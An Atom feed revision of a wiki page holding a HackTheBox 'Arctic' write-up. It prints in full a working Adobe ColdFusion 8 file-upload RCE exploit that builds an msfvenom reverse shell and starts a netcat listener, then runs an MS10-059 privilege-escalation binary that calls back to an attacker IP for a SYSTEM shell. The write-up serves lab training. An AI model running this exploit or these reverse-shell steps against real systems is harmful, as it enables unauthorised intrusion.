<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://book.ghanim.no/index.php?action=history&amp;feed=atom&amp;title=Write-ups%2FHTB%2FArctic</id>
	<title>Write-ups/HTB/Arctic - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://book.ghanim.no/index.php?action=history&amp;feed=atom&amp;title=Write-ups%2FHTB%2FArctic"/>
	<link rel="alternate" type="text/html" href="https://book.ghanim.no/index.php?title=Write-ups/HTB/Arctic&amp;action=history"/>
	<updated>2026-04-21T16:18:21Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://book.ghanim.no/index.php?title=Write-ups/HTB/Arctic&amp;diff=1186&amp;oldid=prev</id>
		<title>imported&gt;Aghanim at 19:28, 1 February 2022</title>
		<link rel="alternate" type="text/html" href="https://book.ghanim.no/index.php?title=Write-ups/HTB/Arctic&amp;diff=1186&amp;oldid=prev"/>
		<updated>2022-02-01T19:28:04Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;{{Infobox WriteUp&lt;br /&gt;
| name = Arctic&lt;br /&gt;
| platform = HackTheBox&lt;br /&gt;
| os = Windows&lt;br /&gt;
| difficulty = Easy&lt;br /&gt;
| techniques = ColdFusion, File Upload, MS10-059&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
[[File:2022-02-image.png|thumb]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This Windows machine was a relativly easy machine. There was FMTP server running on port 8500, and in that FMTP it was pointing to /administrator directory which was running &amp;#039;&amp;#039;&amp;#039;Adobe Cold Fusion. &amp;#039;&amp;#039;&amp;#039;Cold fusion was vulnerable to file upload RCE which we exploited and got a shell. I then used MS10-059 vulnerabilty to get a NT AUTHORITY\ SYSTEM shell.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Enumeration ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I&amp;#039;ll start with a NMAP scan.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/arctic]&lt;br /&gt;
└─# nmap -sC -sV -p- --min-rate 10000 10.10.10.11 -oN nmap.ver&lt;br /&gt;
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-26 14:54 EST&lt;br /&gt;
Nmap scan report for 10.10.10.11&lt;br /&gt;
Host is up (0.032s latency).&lt;br /&gt;
Not shown: 65532 filtered tcp ports (no-response)&lt;br /&gt;
PORT      STATE SERVICE VERSION&lt;br /&gt;
135/tcp   open  msrpc   Microsoft Windows RPC&lt;br /&gt;
8500/tcp  open  fmtp?&lt;br /&gt;
49154/tcp open  msrpc   Microsoft Windows RPC&lt;br /&gt;
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows&lt;br /&gt;
&lt;br /&gt;
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .&lt;br /&gt;
Nmap done: 1 IP address (1 host up) scanned in 147.42 seconds&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
There are ports open &amp;#039;&amp;#039;&amp;#039;135 &amp;#039;&amp;#039;&amp;#039;which is running MSRPC, &amp;#039;&amp;#039;&amp;#039;port 8500 &amp;#039;&amp;#039;&amp;#039;which is running FMTP and &amp;#039;&amp;#039;&amp;#039;port 49154 &amp;#039;&amp;#039;&amp;#039;which is running MSRPC,&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vising port 8500 I see this FTP server sharing different files and directories. One interesting directory is &amp;#039;&amp;#039;&amp;#039;administrator. &amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:2022-02-Pasted-image-20220126214350.png|thumb]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
When clicking on administrator, I get a login window for Adobe ColdFusion 8. ColdFusion is most often used for &amp;#039;&amp;#039;&amp;#039;data-driven websites or intranets&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:2022-02-Pasted-image-20220126214428.png|thumb]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Running searchsploit I see that there is a RCE vulnerability on ColdFusion 8.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/arctic]&lt;br /&gt;
└─# searchsploit coldfusion&lt;br /&gt;
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------&lt;br /&gt;
 Exploit Title                                                                                                                                             |  Path&lt;br /&gt;
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------&lt;br /&gt;
Adobe ColdFusion 8 - Remote Command Execution (RCE)                                                                                                        | cfm/webapps/50057.py&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Initial Access ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lets look at the python script.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/arctic]&lt;br /&gt;
└─# cat 50057.py&lt;br /&gt;
# Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE)&lt;br /&gt;
# Google Dork: intext:&amp;quot;adobe coldfusion 8&amp;quot;&lt;br /&gt;
# Date: 24/06/2021&lt;br /&gt;
# Exploit Author: Pergyz&lt;br /&gt;
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html&lt;br /&gt;
# Version: 8&lt;br /&gt;
# Tested on: Microsoft Windows Server 2008 R2 Standard&lt;br /&gt;
# CVE : CVE-2009-2265&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python3&lt;br /&gt;
&lt;br /&gt;
from multiprocessing import Process&lt;br /&gt;
import io&lt;br /&gt;
import mimetypes&lt;br /&gt;
import os&lt;br /&gt;
import urllib.request&lt;br /&gt;
import uuid&lt;br /&gt;
&lt;br /&gt;
class MultiPartForm:&lt;br /&gt;
&lt;br /&gt;
    def __init__(self):&lt;br /&gt;
        self.files = []&lt;br /&gt;
        self.boundary = uuid.uuid4().hex.encode(&amp;#039;utf-8&amp;#039;)&lt;br /&gt;
        return&lt;br /&gt;
&lt;br /&gt;
    def get_content_type(self):&lt;br /&gt;
        return &amp;#039;multipart/form-data; boundary={}&amp;#039;.format(self.boundary.decode(&amp;#039;utf-8&amp;#039;))&lt;br /&gt;
&lt;br /&gt;
    def add_file(self, fieldname, filename, fileHandle, mimetype=None):&lt;br /&gt;
        body = fileHandle.read()&lt;br /&gt;
&lt;br /&gt;
        if mimetype is None:&lt;br /&gt;
            mimetype = (mimetypes.guess_type(filename)[0] or &amp;#039;application/octet-stream&amp;#039;)&lt;br /&gt;
&lt;br /&gt;
        self.files.append((fieldname, filename, mimetype, body))&lt;br /&gt;
        return&lt;br /&gt;
&lt;br /&gt;
    @staticmethod&lt;br /&gt;
    def _attached_file(name, filename):&lt;br /&gt;
        return (f&amp;#039;Content-Disposition: form-data; name=&amp;quot;{name}&amp;quot;; filename=&amp;quot;{filename}&amp;quot;\r\n&amp;#039;).encode(&amp;#039;utf-8&amp;#039;)&lt;br /&gt;
&lt;br /&gt;
    @staticmethod&lt;br /&gt;
    def _content_type(ct):&lt;br /&gt;
        return &amp;#039;Content-Type: {}\r\n&amp;#039;.format(ct).encode(&amp;#039;utf-8&amp;#039;)&lt;br /&gt;
&lt;br /&gt;
    def __bytes__(self):&lt;br /&gt;
        buffer = io.BytesIO()&lt;br /&gt;
        boundary = b&amp;#039;--&amp;#039; + self.boundary + b&amp;#039;\r\n&amp;#039;&lt;br /&gt;
&lt;br /&gt;
        for f_name, filename, f_content_type, body in self.files:&lt;br /&gt;
            buffer.write(boundary)&lt;br /&gt;
            buffer.write(self._attached_file(f_name, filename))&lt;br /&gt;
            buffer.write(self._content_type(f_content_type))&lt;br /&gt;
            buffer.write(b&amp;#039;\r\n&amp;#039;)&lt;br /&gt;
            buffer.write(body)&lt;br /&gt;
            buffer.write(b&amp;#039;\r\n&amp;#039;)&lt;br /&gt;
&lt;br /&gt;
        buffer.write(b&amp;#039;--&amp;#039; + self.boundary + b&amp;#039;--\r\n&amp;#039;)&lt;br /&gt;
        return buffer.getvalue()&lt;br /&gt;
&lt;br /&gt;
def execute_payload():&lt;br /&gt;
    print(&amp;#039;\nExecuting the payload...&amp;#039;)&lt;br /&gt;
    print(urllib.request.urlopen(f&amp;#039;http://{rhost}:{rport}/userfiles/file/{filename}.jsp&amp;#039;).read().decode(&amp;#039;utf-8&amp;#039;))&lt;br /&gt;
&lt;br /&gt;
def listen_connection():&lt;br /&gt;
    print(&amp;#039;\nListening for connection...&amp;#039;)&lt;br /&gt;
    os.system(f&amp;#039;nc -nlvp {lport}&amp;#039;)&lt;br /&gt;
&lt;br /&gt;
if __name__ == &amp;#039;__main__&amp;#039;:&lt;br /&gt;
    # Define some information&lt;br /&gt;
    lhost = &amp;#039;10.10.14.17&amp;#039;&lt;br /&gt;
    lport = 4444&lt;br /&gt;
    rhost = &amp;quot;10.10.10.11&amp;quot;&lt;br /&gt;
    rport = 8500&lt;br /&gt;
    filename = uuid.uuid4().hex&lt;br /&gt;
&lt;br /&gt;
    # Generate a payload that connects back and spawns a command shell&lt;br /&gt;
    print(&amp;quot;\nGenerating a payload...&amp;quot;)&lt;br /&gt;
    os.system(f&amp;#039;msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}.jsp&amp;#039;)&lt;br /&gt;
&lt;br /&gt;
    # Encode the form data&lt;br /&gt;
    form = MultiPartForm()&lt;br /&gt;
    form.add_file(&amp;#039;newfile&amp;#039;, filename + &amp;#039;.txt&amp;#039;, fileHandle=open(filename + &amp;#039;.jsp&amp;#039;, &amp;#039;rb&amp;#039;))&lt;br /&gt;
    data = bytes(form)&lt;br /&gt;
&lt;br /&gt;
    # Create a request&lt;br /&gt;
    request = urllib.request.Request(f&amp;#039;http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&amp;amp;Type=File&amp;amp;CurrentFolder=/{filename}.jsp%00&amp;#039;, data=data)&lt;br /&gt;
    request.add_header(&amp;#039;Content-type&amp;#039;, form.get_content_type())&lt;br /&gt;
    request.add_header(&amp;#039;Content-length&amp;#039;, len(data))&lt;br /&gt;
&lt;br /&gt;
    # Print the request&lt;br /&gt;
    print(&amp;#039;\nPriting request...&amp;#039;)&lt;br /&gt;
&lt;br /&gt;
    for name, value in request.header_items():&lt;br /&gt;
        print(f&amp;#039;{name}: {value}&amp;#039;)&lt;br /&gt;
&lt;br /&gt;
    print(&amp;#039;\n&amp;#039; + request.data.decode(&amp;#039;utf-8&amp;#039;))&lt;br /&gt;
&lt;br /&gt;
    # Send the request and print the response&lt;br /&gt;
    print(&amp;#039;\nSending request and printing response...&amp;#039;)&lt;br /&gt;
    print(urllib.request.urlopen(request).read().decode(&amp;#039;utf-8&amp;#039;))&lt;br /&gt;
&lt;br /&gt;
    # Print some information&lt;br /&gt;
    print(&amp;#039;\nPrinting some information for debugging...&amp;#039;)&lt;br /&gt;
    print(f&amp;#039;lhost: {lhost}&amp;#039;)&lt;br /&gt;
    print(f&amp;#039;lport: {lport}&amp;#039;)&lt;br /&gt;
    print(f&amp;#039;rhost: {rhost}&amp;#039;)&lt;br /&gt;
    print(f&amp;#039;rport: {rport}&amp;#039;)&lt;br /&gt;
    print(f&amp;#039;payload: {filename}.jsp&amp;#039;)&lt;br /&gt;
&lt;br /&gt;
    # Delete the payload&lt;br /&gt;
    print(&amp;quot;\nDeleting the payload...&amp;quot;)&lt;br /&gt;
    os.system(f&amp;#039;rm {filename}.jsp&amp;#039;)&lt;br /&gt;
&lt;br /&gt;
    # Listen for connections and execute the payload&lt;br /&gt;
    p1 = Process(target=listen_connection)&lt;br /&gt;
    p1.start()&lt;br /&gt;
    p2 = Process(target=execute_payload)&lt;br /&gt;
    p2.start()&lt;br /&gt;
    p1.join()&lt;br /&gt;
    p2.join()&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It first generate a payload using msfvenom and then ecodes it. It then sends a request to &amp;lt;code&amp;gt;/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&amp;amp;Type=File&amp;amp;CurrentFolder=/{filename}.jsp%00&amp;lt;/code&amp;gt;. It adds a null byte at the end of the POST request which just means it will terminate user supplied data. It will then give us a connection back to our netcat listener.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
C:\ColdFusion8\runtime\bin&amp;gt;whoami&lt;br /&gt;
whoami&lt;br /&gt;
arctic\tolis&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Privilege escalation ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I&amp;#039;ll run &amp;#039;&amp;#039;&amp;#039;systeminfo&amp;#039;&amp;#039;&amp;#039; command to get an idea of the system Im dealing with.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
C:\ColdFusion8\runtime\bin&amp;gt;systeminfo&lt;br /&gt;
systeminfo&lt;br /&gt;
&lt;br /&gt;
Host Name:                 ARCTIC&lt;br /&gt;
OS Name:                   Microsoft Windows Server 2008 R2 Standard&lt;br /&gt;
OS Version:                6.1.7600 N/A Build 7600&lt;br /&gt;
OS Manufacturer:           Microsoft Corporation&lt;br /&gt;
OS Configuration:          Standalone Server&lt;br /&gt;
OS Build Type:             Multiprocessor Free&lt;br /&gt;
Registered Owner:          Windows User&lt;br /&gt;
Registered Organization:&lt;br /&gt;
Product ID:                55041-507-9857321-84451&lt;br /&gt;
Original Install Date:     22/3/2017, 11:09:45 ��&lt;br /&gt;
System Boot Time:          28/1/2022, 5:52:00 ��&lt;br /&gt;
System Manufacturer:       VMware, Inc.&lt;br /&gt;
System Model:              VMware Virtual Platform&lt;br /&gt;
System Type:               x64-based PC&lt;br /&gt;
Processor(s):              1 Processor(s) Installed.&lt;br /&gt;
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz&lt;br /&gt;
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018&lt;br /&gt;
Windows Directory:         C:\Windows&lt;br /&gt;
System Directory:          C:\Windows\system32&lt;br /&gt;
Boot Device:               \Device\HarddiskVolume1&lt;br /&gt;
System Locale:             el;Greek&lt;br /&gt;
Input Locale:              en-us;English (United States)&lt;br /&gt;
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul&lt;br /&gt;
Total Physical Memory:     6.143 MB&lt;br /&gt;
Available Physical Memory: 5.067 MB&lt;br /&gt;
Virtual Memory: Max Size:  12.285 MB&lt;br /&gt;
Virtual Memory: Available: 11.244 MB&lt;br /&gt;
Virtual Memory: In Use:    1.041 MB&lt;br /&gt;
Page File Location(s):     C:\pagefile.sys&lt;br /&gt;
Domain:                    HTB&lt;br /&gt;
Logon Server:              N/A&lt;br /&gt;
Hotfix(s):                 N/A&lt;br /&gt;
Network Card(s):           1 NIC(s) Installed.&lt;br /&gt;
                           [01]: Intel(R) PRO/1000 MT Network Connection&lt;br /&gt;
                                 Connection Name: Local Area Connection&lt;br /&gt;
                                 DHCP Enabled:    No&lt;br /&gt;
                                 IP address(es)&lt;br /&gt;
                                 [01]: 10.10.10.11&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
So this is a Windows server 2008 R2 running on x64 architecture.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I&amp;#039;ll use windows exploit suggester which will analyze the systeminfo output and give us possible privesc vectors.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
┌──(root💀kali)-[/opt/Windows-Exploit-Suggester]&lt;br /&gt;
└─# python2 windows-exploit-suggester.py --systeminfo sys.txt -d 2022-01-14-mssb.xls                                                                   130 ⨯&lt;br /&gt;
[*] initiating winsploit version 3.3...&lt;br /&gt;
[*] database file detected as xls or xlsx based on extension&lt;br /&gt;
[*] attempting to read from the systeminfo input file&lt;br /&gt;
[+] systeminfo input file read successfully (utf-8)&lt;br /&gt;
[*] querying database file for potential vulnerabilities&lt;br /&gt;
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits&lt;br /&gt;
[*] there are now 197 remaining vulns&lt;br /&gt;
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin&lt;br /&gt;
[+] windows version identified as &amp;#039;Windows 2008 R2 64-bit&amp;#039;&lt;br /&gt;
[*]&lt;br /&gt;
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical&lt;br /&gt;
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important&lt;br /&gt;
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical&lt;br /&gt;
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP &amp;amp; EMET 5., PoC&lt;br /&gt;
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP &amp;amp; EMET 5.0 Bypass (MS12-037), PoC&lt;br /&gt;
[*]&lt;br /&gt;
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important&lt;br /&gt;
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important&lt;br /&gt;
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical&lt;br /&gt;
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important&lt;br /&gt;
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important&lt;br /&gt;
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical&lt;br /&gt;
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical&lt;br /&gt;
[*] done&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
There are many different exploits I could use.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;MS11-011&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;MS10-073&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;MS10-059&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I tried a couple, before getting a NT AUTHORITY\SYSTEM shell with MS10-059.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I&amp;#039;ll use this https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri to get a admin reverse shell.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Description ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&lt;br /&gt;
This security update resolves one publicly disclosed vulnerability and one privately reported vulnerability in the Tracing Feature for Services. The vulnerabilities could allow elevation of privilege if an attacker runs a specially crafted application. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.&lt;br /&gt;
https://www.rapid7.com/db/vulnerabilities/WINDOWS-HOTFIX-MS10-059/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To get the exploit to the target machine I started a &amp;#039;&amp;#039;&amp;#039;smbserver &amp;#039;&amp;#039;&amp;#039;on my attacker machine and copied the binary over. After that I ran the exploit on the target machine.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
C:\Users\tolis\Downloads&amp;gt;.\Chimichurri.exe 10.10.14.17 4444&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
┌──(root💀kali)-[/home/aghanim]&lt;br /&gt;
└─# nc -lvnp 5555                                                                                                                                                                        1 ⨯&lt;br /&gt;
listening on [any] 5555 ...&lt;br /&gt;
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.11] 49580&lt;br /&gt;
Microsoft Windows [Version 6.1.7600]&lt;br /&gt;
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.&lt;br /&gt;
&lt;br /&gt;
C:\Users\tolis\Downloads&amp;gt;whoami&lt;br /&gt;
whoami&lt;br /&gt;
nt authority\system&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== What I&amp;#039;ve learned ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Since the developer was not careful about what they were sharing on the FTP server I had access to Adobe ColdFusion whcih probably should not be exposed to me. I use a upload RCE to get a reverse shell. * Running Windows exploit suggester is easy and can give quick result. However, using something else such as Watson or winPEAS will probably yield better result. There might be a privesc vector through misconfiguration instead and windows exploit suggester wont catch that.&lt;br /&gt;
&lt;br /&gt;
[[Category:HackTheBox]]&lt;br /&gt;
[[Category:Windows]]&lt;br /&gt;
[[Category:Write-ups]]&lt;/div&gt;</summary>
		<author><name>imported&gt;Aghanim</name></author>
	</entry>
</feed>